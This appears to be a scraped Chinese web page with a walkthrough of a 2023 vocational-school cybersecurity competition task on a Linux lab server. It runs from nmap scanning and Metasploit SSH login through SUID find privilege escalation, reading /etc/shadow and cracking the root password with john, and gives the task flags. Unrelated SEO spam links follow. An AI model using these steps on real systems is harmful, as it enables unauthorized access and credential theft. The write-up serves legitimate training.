当前位置: 首页 > news >正文

建设网站实训心得珠海网站建设

建设网站实训心得,珠海网站建设,东营住房和城乡建设部网站,携创网2023年中职"网络安全"—Linux系统渗透提权② Linux操作系统渗透测试任务环境说明:1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag…

2023年中职"网络安全"—Linux系统渗透提权②

  • Linux操作系统渗透测试
    • 任务环境说明:
      • 1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;
      • 2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;
      • 3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;
      • 4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;
      • 5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

Linux操作系统渗透测试

任务环境说明:

  • 服务器场景:Server2203(关闭链接)
  • 用户名:hacker 密码:123456

1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

nmap -p- -sV 靶机IP        # -p- 全端口,-sV 版本探测


flag: 2232/tcp

2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;

ssh hacker@靶机IP -p 2232            # -p 指定端口,这里有点小坑,应该kali的ssh版本高,靶机的ssh版本低,导致的。

# 解法 1
ssh hacker@靶机IP -p 2232 -oKexAlgorithms=+diffie-hellman-group1-sha1        # -oKexAlgorithms=+diffie-hellman-group1-sha1 加上这个算,你可以点击下面的链接

legacy.html

# 解法 2 
msfconsole                    # 我只说你可能不懂得
search ssh_login
use 0
set RHOSTS 靶机IP
set username hacker
set password 123456
set RPORT 2232                # 注意一定要改端口,别忘记了
run
sessions -l                   # 列出会话
sessions 1                    # 连接第一个会话

uname -a        # 查看系统基本信息


flag: 1doLfH31

3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

uname -a        # 查看系统基本信息


flag: 2.6.18-8.el5

4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

find / -perm -u=s -type f 2>/dev/null

touch 1                            # 创建个文件
ls                                 # ls 查看文件
/usr/bin/find 1 -exec id \;        # 提权 -exec 执行命令 \; 结束

/usr/bin/find 1 -exec ls /root \;
/usr/bin/find 1 -exec cat /root/key.txt \;


flag: 84pPxbiP

5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

/usr/bin/find 1 -exec cat /etc/shadow \;

vim hash            # 把root信息行写入进去
cat hash            # 查看是否写入成功
john hash           # 破解密码


flag: darkman

  1. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。
su root                            # 切换root用户
id                                 # 查看id是否为root
cd                                 # 不加参数会直接回到当前用户的家目录
pwd                                # 查看当前所在目录路径
python -V                          # 查看当前python版本
python -m SimpleHTTPServer 8080    # 开启HTTP服务,端口8080

访问的时候一定要指定8080端口


flag: HVcKG7tf

http://www.15wanjia.com/news/181081.html

相关文章:

  • 怎么做网站站内优化wordpress资源网主题
  • wordpress建站导航域名注册过程
  • 泉州网站模板建站小程序搭建需要什么
  • 重庆响应式网站多少钱医院网站内链优化
  • 网站如何做中英文切换国外做多媒体展览的网站
  • 网站建设商业计划书模板范文佛山网站建设wantsun
  • 西安外贸网站开发企业营销方案案例范文
  • 广州外贸网站建设公司价格个人网站模板h5
  • 企业网站建设费用微型购物网站建设模板
  • 重庆网上注册公司网站石狮网站建设科技
  • 经销做网站都有什么好处高端ppt制作
  • 可以把网站生成软件wordpress移动cms主题
  • 建网站收费吗义乌公司网站建设
  • 股权变更要在工商局网站做吗山东省建设职业教育集团网站
  • 石家庄外贸网站建设公司排名网站做apk制作工具
  • 网站中搜索关键词wordpress 阿里大鱼
  • 网站设计包括哪些内容钢筋网片价格
  • 淘宝了做网站卖什么好网上怎么做宣传啊
  • 集约化网站数据库建设规范排版设计的网站
  • 设计基础网站推荐北京建设网点地址查询
  • 小学学校网站设计模板百度账号怎么注销
  • 网站未备案什么意思小说网站建设方案书ppt模板
  • ui下载高清素材的网站有哪些自己开发app怎么赚钱
  • 做黄金的人喜欢逛那些网站wap网站欣赏
  • 协会宣传网站开发方案中国门户网站有哪些
  • 廊坊网站建设总部在哪里互粉的网站是怎么做的
  • 网站设计的留言怎么做什么是电子商务法
  • 兴义网站网站建设成全在线观看免费高清动漫
  • 建瓯市建设局网站嘿嘿嘿你懂我意思正能量
  • 教程建设网站wordpress修改管理员密码